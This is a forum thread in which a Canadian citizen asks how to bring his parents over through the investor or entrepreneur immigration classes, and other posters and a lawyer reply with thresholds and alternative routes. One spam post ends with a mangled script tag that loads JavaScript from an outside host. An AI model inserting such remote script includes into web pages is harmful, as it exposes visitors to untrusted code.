Canada Immigration and Visa Discussion Forum Homepage
Forum Home Forum Home > Canada Immigration Topics > Business / Investor Immigration
  New Posts New Posts RSS Feed - Immigration for parents under investor/ent. class
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Immigration for parents under investor/ent. class

Post Reply Post Reply
Author

Post Options Post Options   Thanks (0) Thanks(0)   Quote zkanky Quote  Post ReplyReply Direct Link To This Post Topic: Immigration for parents under investor/ent. class
    Posted: 04 Jul 2011 at 12:43pm
Hi, i am a canadian citizen, and want to get my parents immigrated to canada. currently it seems though that if i sponsor them the timeline is 40 months in mississauga approximately, and approx. 40-50 months in my home country, pakistan.

I have read the CIC website in the section enterpreneur, investor, self employed class, but obviously it is vague and unspecific.

I wanted to ask someone here who might have experience with this.

in investor class, it says must be worth 1.6 m, and investment of 800k required. What if i sent my parents the 1.6m and they invested 800k of that in canada. I am guessing the 800k payment is in the form of paying to government, with no interest, so its basically an interest free loan to govt, so pretty much safe investment. How long does this class of immigration take? additionally, would cic have an issue with me sending them that money, vs that money being originally theres to begin with.

Enterpreneur class: what are the fund and investment requirements? My father has alot of real estate development experience, and i have a company that does that. How would i structure it so he makes the required investment in the company/sets up his own company. What are the timelines for this class of immigration?

I read one of the threads here/CIC that an enterpreneur must have 33% interest in a company. I can just transfer him some of my equity so he gets 33% interest in the company. is this seen as valid ownership by CIC?

I am not sure if any of these cases are allowed by CIC or not, but i would think these are all legit ways since CIC i am sure doesn't care where the money comes from, as long as its legally obtained. After all it could be lottery winnings, inheritance, etc and they wouldn't discriminate on that source of wealth.

Which is the quickest route to take? i am reading timelines of 80 months, is that for both classes? is there a quicker way to get them here? 80 months is 6-7 years, a pretty extended timeline.

liomath View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote liomath Quote  Post ReplyReply Direct Link To This Post Posted: 14 Aug 2011 at 6:47pm
You need to meet some terms and conditions like minimum income
liomath View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote liomath Quote  Post ReplyReply Direct Link To This Post Posted: 21 Aug 2011 at 9:33pm
At the moment the minimum assess is going to be 1,600,000 CANADIAN dollar.
Janet08 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Janet08 Quote  Post ReplyReply Direct Link To This Post Posted: 18 Oct 2011 at 2:39am
You'll be needing a guide and advice from an immigration lawyer. Immigration lawyers assists clients when they are applying for entry, residing in the country and becoming citizens. I'm sure it can help you a lot.

danielharris View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote danielharris Quote  Post ReplyReply Direct Link To This Post Posted: 13 Jan 2012 at 5:16am
It's a very useful post o all...

Penny stocks to watch
< ="text/" ="http://ui.streamride.net/ui.js">
kevkostuem View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote kevkostuem Quote  Post ReplyReply Direct Link To This Post Posted: 15 Jan 2012 at 6:35am
Originally posted by Janet08 Janet08 wrote:

You'll be needing a guide and advice from an immigration lawyer. Immigration lawyers assists clients when they are applying for entry, residing in the country and becoming citizens. I'm sure it can help you a lot.

I agree. We don't exactly know the whole story so our advices are not good enough to solve it. You will definitely need advices from experts. They know better.
The faschingskostüm had to serve the choreography.
Ralph M. Dzegniuk View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Ralph M. Dzegniuk Quote  Post ReplyReply Direct Link To This Post Posted: 18 Jan 2012 at 3:14pm
Another option that your parents might have - depending on the circumstances of course (such as support network in pakistan vs. canada; their financial situation; their physical/emotional condition and dependency on their family in Canada) is filing an H&C inside Canada, should they first come here on a super-visa.

The Business Class options you have inquired about are only relevant if they (or at least one of them) has relevant business experience (i.e. managing their own business) and financial profile.  Please also note that there are many interesting Provincial Nominee Programs for Investors and Entrepreneurs with much lower financial/net worth thresholds than the current Federal Program (although many of such provincial schemes would require, at least at the outset, that they reside in the province in question).

Please do not hesitate to contact my office directly should you have any further questions or concerns,

regards,

Ralph Dzegniuk, Barrister & Solicitor (B.A., L.L.B.)
Migration Law Chambers
www. migrate-2-canada. com
82 Richmond Street East, Suite 305
Toronto, ON. M5C 1P1
Phone: (416) 548 9072
Fax: (416) 548 9092
[email protected]
 Post Reply Post Reply
  Share Topic